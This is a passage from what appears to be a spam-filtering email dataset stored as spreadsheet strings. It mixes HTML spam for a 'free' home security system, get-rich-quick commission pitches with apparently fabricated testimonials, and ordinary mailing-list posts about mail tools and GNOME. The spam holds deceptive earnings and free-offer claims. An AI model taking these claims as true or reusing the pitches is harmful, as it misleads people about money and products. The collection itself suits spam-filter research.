   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:24.0pt;
   font-family:Arial'&gt;Over 135,000 &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:24.0pt;
   font-family:Arial'&gt;Families made &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;b&gt;&lt;span style=3D'font-siz=
 e:24.0pt;
   font-family:Arial'&gt;the right &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'margin-bottom:12.0pt;text-align:center'&gt;&lt;b&gt;&lt;s=
 pan
   style=3D'font-size:24.0pt;font-family:Arial'&gt;choice!&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;p class=3DMsoNormal align=3Dcenter style=3D'text-align:center'&gt;&lt;span
 style=3D'color:black;display:none;mso-hide:all'&gt;&lt;![if !supportEmptyParas]&gt;=
 &amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;div align=3Dcenter&gt;
 &lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D"85%" style=3D'w=
 idth:85.0%;
  mso-cellspacing:0in;mso-padding-alt:0in 0in 0in 0in'&gt;
  &lt;tr&gt;
   &lt;td width=3D"19%" style=3D'width:19.0%;background:#00125E;padding:0in 0i=
 n 0in 0in'&gt;
   &lt;p class=3DMsoNormal&gt;&amp;nbsp;&lt;/p&gt;
   &lt;/td&gt;
   &lt;td width=3D"81%" style=3D'width:81.0%;padding:0in 0in 0in 0in'&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&amp;nbsp;&lt;/p&gt;
   &lt;p&gt;&lt;b&gt;&lt;span style=3D'font-size:10.0pt;font-family:Arial;color:#00125E'&gt;I=
 n these
   troubled times, your family's safety is more important than ever! &lt;/span=
 &gt;&lt;/b&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:black'&gt;Defend your fam=
 ily
   against the threat of home invasion and forced entry. Make sure you're
   prepared to get help in the event of an emergency. &lt;/span&gt;&lt;b&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:#00125E'&gt;Take advantag=
 e of
   the following special offer.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p&gt;&lt;span style=3D'font-size:10.0pt;font-family:Arial'&gt;For a limited time=
  you
   can receive our &lt;strong&gt;&lt;span style=3D'color:#00125E'&gt;home security syst=
 em, &lt;/span&gt;&lt;/strong&gt;THE
   most comprehensive home security package ever offered&lt;strong&gt;&lt;span
   style=3D'color:#00125E'&gt; for FREE!&amp;nbsp; You must call the Toll Free num=
 ber
   below to qualify for this Special Offer.&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
   &lt;p&gt;&lt;b&gt;&lt;span style=3D'font-size:10.0pt;font-family:Arial;color:#00125E'&gt;Y=
 ou
   don't have to be a victim!&lt;span style=3D"mso-spacerun: yes"&gt;&amp;nbsp; &lt;/spa=
 n&gt;&lt;/span&gt;&lt;/b&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial'&gt;Intelligent homeowners are
   awakening to one undeniable fact. Studies show burglars will commit crim=
 es
   somewhere else when confronted with a monitored security system.&amp;nbsp;Ou=
 r
   home security system provides ultimate protection for your family and ho=
 me,
   24-hours each and every day. The bad guys will have to go elsewhere to f=
 ind
   their victim.&lt;/span&gt;&lt;/p&gt;
   &lt;p&gt;&lt;b&gt;&lt;span style=3D'font-size:10.0pt;font-family:Arial;color:#00125E'&gt;S=
 tate-of-the-art
   wireless technology! &lt;span style=3D"mso-spacerun: yes"&gt;&amp;nbsp;&lt;/span&gt;&lt;/sp=
 an&gt;&lt;/b&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial'&gt;Our security system is adva=
 nced
   wireless technology which enables a clean installation in approximately =
 one hour.
   No holes to drill, no unsightly wires to run.&lt;/span&gt;&lt;/p&gt;
   &lt;p&gt;&lt;span style=3D'font-size:10.0pt;font-family:Arial'&gt;Replacement parts
   (probably never needed) are &lt;b&gt;&lt;span style=3D'color:#00125E'&gt;also free&lt;/=
 span&gt;&lt;/b&gt;,
   with your &lt;b&gt;&lt;span style=3D'color:#00125E'&gt;Lifetime Guaranteed Parts
   Replacement Warranty&lt;/span&gt;&lt;/b&gt; for as long as your home is monitored by=
  our
   authorized UL listed monitoring facility. That tells you the confidence =
 we
   place in our product's quality.&lt;/span&gt;&lt;/p&gt;
   &lt;p&gt;&lt;span style=3D'font-size:10.0pt;font-family:Arial;color:black'&gt;We are
   absolutely confident our security system &lt;/span&gt;&lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:#00125E'&gt;provides the
   necessary deterrence and detection&lt;/span&gt;&lt;/strong&gt;&lt;span style=3D'font-si=
 ze:
   10.0pt;font-family:Arial'&gt; your home needs. To prove it, &lt;b&gt;&lt;span
   style=3D'color:#00125E'&gt;The company will pay your insurance deductible (=
 Up to
   $250.00)&lt;/span&gt;&lt;/b&gt; in the unlikely event you suffer a loss from an unwa=
 nted
   intrusion.&lt;b&gt;&lt;span style=3D'color:#00125E'&gt; You also may be eligible for=
  up to
   20% in insurance premium discounts.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
   &lt;p&gt;&lt;strong&gt;&lt;span style=3D'font-size:10.0pt;font-family:Arial;color:black=
 '&gt;To
   see if you qualify for this exciting offer, simply phone the toll free n=
 umber
   below, answer a few simple questions, and&amp;nbsp;possibly have your new ho=
 me
   security system installed,&lt;/span&gt;&lt;/strong&gt; &lt;strong&gt;&lt;span style=3D'font-s=
 ize:
   10.0pt;font-family:Arial;color:black'&gt;in your home, within 48 hours.&lt;/sp=
 an&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;p class=3DMsoNormal align=3Dcenter style=3D'text-align:center'&gt;&lt;span
 style=3D'color:black;display:none;mso-hide:all'&gt;&lt;![if !supportEmptyParas]&gt;=
 &amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;div align=3Dcenter&gt;
 &lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D"85%" style=3D'w=
 idth:85.0%;
  mso-cellspacing:0in;mso-padding-alt:0in 0in 0in 0in'&gt;
  &lt;tr&gt;
   &lt;td width=3D"19%" style=3D'width:19.0%;background:#00125E;padding:0in 0i=
 n 0in 0in'&gt;
   &lt;p class=3DMsoNormal&gt;&amp;nbsp;&lt;/p&gt;
   &lt;/td&gt;
   &lt;td width=3D"81%" style=3D'width:81.0%;padding:0in 0in 0in 0in'&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   24.0pt;font-family:Arial;color:red'&gt;Call NOW !!&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/str=
 ong&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   36.0pt;font-family:Arial;color:red'&gt;1-800-775-0738&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   10.0pt;font-family:Arial;color:#00125E'&gt;Operators are on duty 10&lt;/span&gt;&lt;=
 /strong&gt;&lt;strong&gt;&lt;span
   style=3D'font-size:13.5pt;font-family:Arial;color:#00125E'&gt;:&lt;/span&gt;&lt;/str=
 ong&gt;&lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:#00125E'&gt;00 AM to 10:0=
 0 PM
   EDT Monday-Friday,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   10.0pt;font-family:Arial;color:#00125E'&gt;10:00 AM to 2:00 PM EDT on Satur=
 day&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;
   &lt;p&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;p class=3DMsoNormal align=3Dcenter style=3D'text-align:center'&gt;&lt;span
 style=3D'color:black;display:none;mso-hide:all'&gt;&lt;![if !supportEmptyParas]&gt;=
 &amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;div align=3Dcenter&gt;
 &lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D"85%" style=3D'w=
 idth:85.0%;
  mso-cellspacing:0in;mso-padding-alt:0in 0in 0in 0in'&gt;
  &lt;tr&gt;
   &lt;td width=3D"19%" style=3D'width:19.0%;background:#00125E;padding:0in 0i=
 n 0in 0in'&gt;
   &lt;p class=3DMsoNormal&gt;&amp;nbsp;&lt;/p&gt;
   &lt;/td&gt;
   &lt;td width=3D"81%" style=3D'width:81.0%;padding:0in 0in 0in 0in'&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   18.0pt;font-family:Arial;color:black'&gt;Your system will include the follo=
 wing:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p&gt;&lt;strong&gt;&lt;span style=3D'font-size:10.0pt;font-family:Arial;color:red'&gt;=
 *&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:black'&gt; No Connection =
 Fee &lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:red'&gt;*&lt;/span&gt;&lt;/strong&gt;=
 &lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:black'&gt; 10 Doors/Windo=
 ws
   Protected &lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style=3D'font-size:10.0pt;font-f=
 amily:
   Arial;color:red'&gt;* &lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style=3D'font-size:10.0=
 pt;
   font-family:Arial;color:black'&gt;Lifetime Warranty &lt;/span&gt;&lt;/strong&gt;&lt;strong=
 &gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:red'&gt;* &lt;/span&gt;&lt;/strong=
 &gt;&lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:black'&gt;Wireless-no dri=
 lling,
   no mess &lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style=3D'font-size:10.0pt;font-fam=
 ily:
   Arial;color:red'&gt;*&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style=3D'font-size:10.0p=
 t;
   font-family:Arial;color:black'&gt;You own the System! &lt;/span&gt;&lt;/strong&gt;&lt;stro=
 ng&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:red'&gt;*&lt;/span&gt;&lt;/strong&gt;=
 &lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:black'&gt;Pages you when =
 the
   kids get Home &lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style=3D'font-size:10.0pt;
   font-family:Arial;color:red'&gt;*&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   10.0pt;font-family:Arial;color:black'&gt;Rechargeable Battery Backup &lt;/span=
 &gt;&lt;/strong&gt;&lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:red'&gt;* &lt;/span&gt;&lt;/strong=
 &gt;&lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:black'&gt;Yard Signs and =
 Window
   Decals&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p&gt;&lt;strong&gt;&lt;span style=3D'font-size:10.0pt;font-family:Arial;color:black=
 '&gt;Remember,&amp;nbsp;
   the system is Free and could save you as much as 20% on your Homeowners
   Insurance.&amp;nbsp; This is a &lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style=3D'font-s=
 ize:
   10.0pt;font-family:Arial;color:navy'&gt;limited time offer&lt;/span&gt;&lt;/strong&gt;&lt;=
 strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:black'&gt;, so call now t=
 o
   qualify for your &lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style=3D'font-size:10.0pt=
 ;
   font-family:Arial;color:red'&gt;FREE HOME SECURITY SYSTEM.&lt;/span&gt;&lt;/strong&gt;&lt;=
 /p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   36.0pt;font-family:Arial;color:red'&gt;Call Today! &lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   10.0pt;font-family:Arial;color:#00125E'&gt;10&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span
   style=3D'font-size:13.5pt;font-family:Arial;color:#00125E'&gt;:&lt;/span&gt;&lt;/str=
 ong&gt;&lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:#00125E'&gt;00 AM to 10:0=
 0 PM
   EDT Monday-Friday,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   10.0pt;font-family:Arial;color:#00125E'&gt;10:00 AM to 2:00 PM EDT on Satur=
 day&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;![if !supportEmptyParas]&gt;=
 &amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   36.0pt;font-family:Arial;color:red'&gt;1-800-775-0738&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;p align=3Dcenter style=3D'text-align:center'&gt;&lt;strong&gt;&lt;span style=3D'fon=
 t-size:
   10.0pt;font-family:Arial;color:gray'&gt;To be removed from future mailings,
   click 'Reply', type&amp;nbsp;'Remove' as your subject, and send.&lt;/span&gt;&lt;/str=
 ong&gt;&lt;strong&gt;&lt;span
   style=3D'font-size:10.0pt;font-family:Arial;color:red'&gt;&amp;nbsp;&amp;nbsp;&lt;/spa=
 n&gt;&lt;/strong&gt;&lt;/p&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;p class=3DMsoNormal&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;=
 &lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On 10 September 2002, Tim Peters said:
 &gt; Why would spam be likely to end up with two instances of Return-Path
 &gt; in the headers?
 Possibly another qmail-ism from Bruce Guenter's spam collection.  Or
 maybe Anthony's right about spammers being stupid and blindly copying
 headers.  (Well, of course he's right about spammers being stupid; it's
 just this particular aspect of stupidity that's open to question.)
         Greg
 -- 
 Greg Ward &lt;gward@python.net&gt;                         http://www.gerg.ca/
 Think honk if you're a telepath.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SF Weekly's Ultimate SF Date lineup :-)
</t>
  </si>
  <si>
    <t xml:space="preserve">I love the absurd sense of humor it takes to build up such an elaborate 
 evening only to note that "even if the date's a bust you can always have 
 a hundred people up for cocktails" in your penthouse suite at the end of 
 the night :-)
 Personally, I'd put one point in favor of the Redwood Room over Lapis: 
 on a weeknight, you can still whip out a TiBook and write, since it's a 
 hotel bar. And it seems to give people all sorts of license to 
 interrogate you as to why you're writing with a double of scotch :-)
 Best,
    Rohit
 &gt; Five Best Ways to Impress Your Date
 &gt;
 &gt; You've met the biped of your dreams at the corner laundromat and, 
 &gt; wonder of wonders, she's agreed to go out with you this Saturday. Don't 
 &gt; blow it! Follow the instructions below and even if you impress your 
 &gt; date so much you never see her again, your evening will be a memorable 
 &gt; one. All you need are a chauffeur, a change of clothes, and several 
 &gt; hundred thousand dollars.
 &gt;
 &gt; Luxury Suite at Pacific Bell Park
 &gt;
 &gt; Third and King streets, 972-2000, www.sfgiants.com
 &gt;
 &gt; Kick off your date with an afternoon at the ballpark -- not just any 
 &gt; ballpark, but just about the best ballpark in the country, and not in 
 &gt; some drafty, behind-the-plate box seat but in one of the park's lushly 
 &gt; accessorized luxury suites. An elevator whisks you from a private 
 &gt; entrance on Willie Mays Plaza to your dwelling place above the infield. 
 &gt; Besides the excellent views of the bay, the park, and the Giants in 
 &gt; action, there's a balcony, a wet bar, a refrigerator, two televisions, 
 &gt; a stereo/CD player, a dual-line phone, Internet access, room service, 
 &gt; and a concierge to call you a cab or make your restaurant reservations 
 &gt; for you. No one is admitted without proper clearance, ensuring your 
 &gt; utmost privacy. Next: Pull yourself together for ...
 &gt;
 &gt; Cocktails at Lapis
 &gt;
 &gt; Pier 33 (Embarcadero at Bay), 982-0203,
 &gt;
 &gt; www.lapis-sf.com
 &gt;
 &gt; Now that the Redwood Room has devolved into just another velvet-rope 
 &gt; yuppie hangout, the city has no clear-cut, top-of-the-line cocktail 
 &gt; lounge such as Chicago's Pump Room or New York's King Cole Bar 
 &gt; (although Maxfield's, the Compass Rose, and the Top of the Mark are 
 &gt; excellent runners-up). Best of all is Lapis, where the wannabe Noel 
 &gt; Coward can sip an estimable Gibson in the lounge adjoining the dining 
 &gt; room. The dramatically backlit bar is framed by lush bronze draperies 
 &gt; that complement the room's deep-blue setting, and towering ceilings 
 &gt; give the lounge a graceful, airy ambience. Floor-to-ceiling windows 
 &gt; provide a lush panorama of the bay and the hills beyond.
 &gt;
 &gt;
 &gt; Dinner at the Dining Room
 &gt;
 &gt; Ritz-Carlton Hotel, 600 Stockton (between Pine and
 &gt;
 &gt; California), 296-7465, www.ritzcarlton.com
 &gt;
 &gt; Your next stop on the road to beguilement is one of the handsomest 
 &gt; dining rooms in the country. The tranquil sounds of a harp underscore a 
 &gt; sumptuous setting of polished mahogany, soft linens, and fine crystal 
 &gt; gleaming in the candlelight. Chef Sylvain Portay prepares luxurious 
 &gt; nouvelle cuisine in several courses: lobster salad with caviar cream; 
 &gt; turbot with crayfish and truffles; roasted squab with port-marinated 
 &gt; figs; saffron-poached pear with guanaja chocolate gratin. Sommelier 
 &gt; Stphane Lacroix maintains a fabulous cellar, the service is impeccable 
 &gt; and inviting, and intimate discourse is practically inevitable. Next:
 &gt;
 &gt; Charter the Rendezvous From Rendezvous Charters
 &gt;
 &gt; Pier 40 (in South Beach Harbor), 543-7333,
 &gt;
 &gt; www.baysail.com
 &gt;
 &gt; Nothing's more enticing than an evening cruise around San Francisco 
 &gt; Bay, and the islands, bridges, and lights of the city are especially 
 &gt; entrancing viewed from this vintage brigantine schooner. Built in 1933 
 &gt; and recently restored to its former glory, the 78-foot Rendezvous looks 
 &gt; like a clipper ship out of the Gold Rush era, with its 80-foot masts 
 &gt; and square-rigged sails. Intricately carved mahogany, pecan, ash, and 
 &gt; rosewood accent the brass-railed, velvet-cushioned rooms below decks, 
 &gt; the perfect spot for a sip of Veuve Cliquot and some subtle canoodling.
 &gt;
 &gt; Penthouse Suite at the Fairmont Hotel
 &gt;
 &gt; 950 Mason (between California and Sacramento),
 &gt;
 &gt; 772-5000, www.fairmont.com
 &gt;
 &gt; Last but not least, escort your companion to what has been described as 
 &gt; the most expensive hotel accommodation in the world: the Fairmont's 
 &gt; elaborate penthouse. The eight-room suite (including three bedrooms, 
 &gt; three baths, a dining room, a library, a billiard room, a fully 
 &gt; equipped kitchen, and a living room with fireplace and baby grand 
 &gt; piano) comes with its own maid, butler, and limousine and is accessed 
 &gt; by private elevator. The library alone is worth investigating: two 
 &gt; circular floors of books encapsulated by a domed ceiling etched with 
 &gt; the constellations. The view from the terrace is enthralling, and even 
 &gt; if the date's a bust you can always have a hundred people up for 
 &gt; cocktails.
 &gt;
 &gt; sfweekly.com | originally published: May 15, 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Authentication Error
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Today's error(received multiple times) was:
 Jul 23 21:16:39.288680 report[98557]: [ 2]  Razor-Agents v2.12 starting
 razor-report ./jobspam
 Jul 23 21:16:46.597147 report[98558]: [ 1] razor-report error: reportit:
 Error 213 while authenticating, aborting.
 I really like the concept of Razor but I find myself wondering if it's
 really a good idea for the developers to be passing off what appears
 to be alpha-quality software as production-ready....
 /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                                Patrick Greenwell
          Asking the wrong questions is the leading cause of wrong answers
 \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Incredible $1,000 COMMISSION per Single $0 down SALE! [ztpxx]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 DID YOU MAKE $5,000 LAST MONTH? IF NOT, 
            YOU NEED TO JOIN US TODAY! 
 ========================================= 
 This is the REAL DEAL!!  Do not delete!  Read 
 entire message. This is NOT "pie in the sky"!! This 
 is NOT MLM!!  It's better than MLM!!  This is a 
 REAL legitimate business with REAL legitimate 
 products,  REAL legitimate income and HUGE residuals. 
 ========================================= 
 Market the hottest consumer savings package in 
 America today and earn up to $1,000 each and 
 every time someone joins for $0 DOWN! 
 Imagine being plugged into a proven system 
 that puts your entire business on auto-pilot and 
 have you earning $3,000 every week! 
 IT'S TRUE! You can be in business for $0 DOWN! 
 And you can easily make $3,000 your very first week... 
 and we'll show you how! Your business will literally 
 explode overnight when you join our team and plug 
 into our exclusive marketing system! 
 For more INFO send an e-mail to: mailto:tim1me2@n2mail.com
 with &lt;Send-Info&gt; in the subject line. 
     *  $0 DOWN ! 
     * 100% FINANCING - 100% CASH MACHINE 
     * EVERYBODY IS A PROSPECT - 98% APPROVED 
     * EARN $1,000 ON EVERY A THROUGH F CREDIT SALE! 
     * EARN $1,000 ON EACH AND EVERY SALE TO INFINITY! 
 We provide you with all the tools and the absolute 
 BEST marketing system available on the web, 
 all resources you will every need - even full tech support!. 
 The only thing you need to do is join our team and plug 
 into our proven system for success today! 
 For more INFO send an e-mail to: mailto:tim1me2@n2mail.com 
 with &lt;Send-Info&gt; in the subject line. 
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 Testimonies: 
 This program is so easy, 'with your system I have 
 made 13 sales first week'. That's $13000' this 
 is the best program I've done and I've done them all! 
 Richard S. Memphis, TN 
 I did it all with my computer! People sign up like crazy! 
 First I said, ok, I am financially totally down, I need to 
 give this one a try. But after two weeks I am already out of debt! 
 Oh god, I did not expect that! And I am not a sales person and I 
 did it! I am so excited, thank you Richard and Mary! 
 Randy S. Los Angeles, CA 
 I am SPEECHLESS! With your FREE leads, and FREE 
 unsecured Visa MC, I was able to advertise free 
 &amp; pay for faxes that got my phone ringing off the 
 hook! I think I'll have 20 sales this month!!! 
 I haven't even begun to download all the free 
 software to make even more MONEY' Thanks guys 
 Randy S. Detroit MI 
 I was in my chiropractor's office when the secretary 
 was about to throw out a fax that they had just received. 
 The fax was similar to this email and caught my eye. 
 I did exactly what it told me to do (a fax blast) and 
 in my second day I made $6,000. No hard selling, no 
 hustling my friends, just friendly people looking at 
 a great opportunity and wanting in. Even if it took 
 me a month to make an extra $5,000 I would have been 
 happy, but $6,000 in my second day, wow! I'm excited. 
 Dave W. Newport Beach, CA 
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 If you have been looking for something that is NOT MLM, 
 is turnkey and very easy to do, then join us now, 
 This is a truly explosive income opportunity! Sign up 3 people 
 &amp; earn $3,000! Sign up 10 people &amp; earn $10,000...how much 
 do you want? This is the easiest sale you will EVER make! 
 GET STARTED WITH INCREDIBLE $0 DOWN + START EARNING 
 $1,000  COMMISSIONS,  YOUR FIRST MONTH! 
 All sales wired into your checking account on a daily basis! 
 Best Regards,
 Robert
 PS: Just put "Remove" in the subject box, to unsubscribe from
 this list.  Thanks.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Mutt reply hooks
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi all,
 I have 3 or 4 email addresses (which get used for different
 reasons), and I'd prefer not to mix them up. So I was wondering
 if anyone knows of a way that I can have mail (apart from list
 mail, which I have already sorted) which arrives to a certain
 e-mail address have the From: header in the reply automatically
 set to the address it came to.
 For example, say I have a company, and sales@company.com,
 info@company.com and tech@company.com arrive in the same mailbox.
 I don't want to reply to sales@company.com mails with the From:
 set to dave@company.com, I would like the mail to come from
 sales@company.com.
 Is there any way to do this? Bearing in mind that mail can arrive
 with my email in the To or Cc fields (and Bcc?), and it might be
 buried in a couple of dozen other recipients...
 Cheers,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: THIS ONE WORKS
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello -
 You get emails every day, offering to show you how to make money.
 Most of these emails are from people who are NOT making any money.
 And they expect you to listen to them?
 Enough.
 If you want to make money with your computer, then you should
 hook up with a group that is actually DOING it.  We are making
 a large, continuing income every month.  What's more - we will
 show YOU how to do the same thing.
 This business is done completely by internet and email, and you
 can even join for free to check it out first.  If you can send
 an email, you can do this.  No special "skills" are required.
 How much are we making?  Anywhere from $500 to $9000 per month.
 We are real people, and most of us work at this business part-time.
 But keep in mind, we do WORK at it - I am not going to 
 insult your intelligence by saying you can sign up, do no work,
 and rake in the cash.  That kind of job does not exist.  But if
 you are willing to put in 10-12 hours per week, this might be
 just the thing you are looking for.
 This is not income that is determined by luck, or work that is
 done FOR you - it is all based on your effort.  But, as I said,
 there are no special skills required.  And this income is RESIDUAL -
 meaning that it continues each month (and it tends to increase
 each month also).
 Interested?  I invite you to find out more.  You can get in as a
 free member, at no cost, and no obligation to continue if you
 decide it is not for you.  We are just looking for people who still
 have that "burning desire" to find an opportunity that will reward
 them incredibly well, if they work at it.
 To grab a FREE ID#, simply reply to: sj95@yahoo.com
 and in the body of the email, write this phrase:
 "Tim, enter my name for a free membership."
 Be sure to include your:
 1. First name
 2. Last name
 3. Email address (if different from above)
 We will confirm your position and send you a special report
 as soon as possible, and also Your free Member Number.
 That's all there's to it.
 We'll then send you info, and you can make up your own mind.
 Looking forward to hearing from you!
 Sincerely, 
 Tim Hopkins
 P.S. After having several negative experiences with network
 marketing companies I had pretty much given up on them.
 This is different - there is value, integrity, and a
 REAL opportunity to have your own home-based business...
 and finally make real money on the internet.
 Don't pass this up..you can sign up and test-drive the
 program for FREE.  All you need to do is get your free
 membership.
 Unsubscribing: Send a blank email to: sj95@yahoo.com with
 "Remove" in the subject line.  By submitting a request for a FREE
 DHS Club Membership, I agree to accept email from the DHS Club for
 both their consumer and business opportunities.
 This message is not intended for residents of the state of
 Washington, and screening of addresses has been done to the best
 of our technical ability.  If you are Washington resident or 
 otherwise wish to be removed from this list, just follow the
 removal instructions above.
 6184JQYf9-897vxaf2019nLAS2-399wyqF8426JMcl39
</t>
  </si>
  <si>
    <t xml:space="preserve">I find Gnome2 with Red Hat's Limbo to be quite nice.
 On Thu, 2002-08-08 at 10:30, Matthias Saou wrote:
 &gt; Once upon a time, Brian wrote :
 &gt; 
 &gt; &gt;     I'm using the Gnome2 set of rpms through apt.  It's very good, though
 &gt; &gt;     it's shy of converted apps and such.  I really like it; it's the
 &gt; &gt;     simple, stable competitor to Windows(tm) that we all need/want/etc.
 &gt; 
 &gt; Well, you can already remove me from your "all" statement... :-( I've been
 &gt; using GNOME 2 at home ever since it made it into Rawhide, and I must say
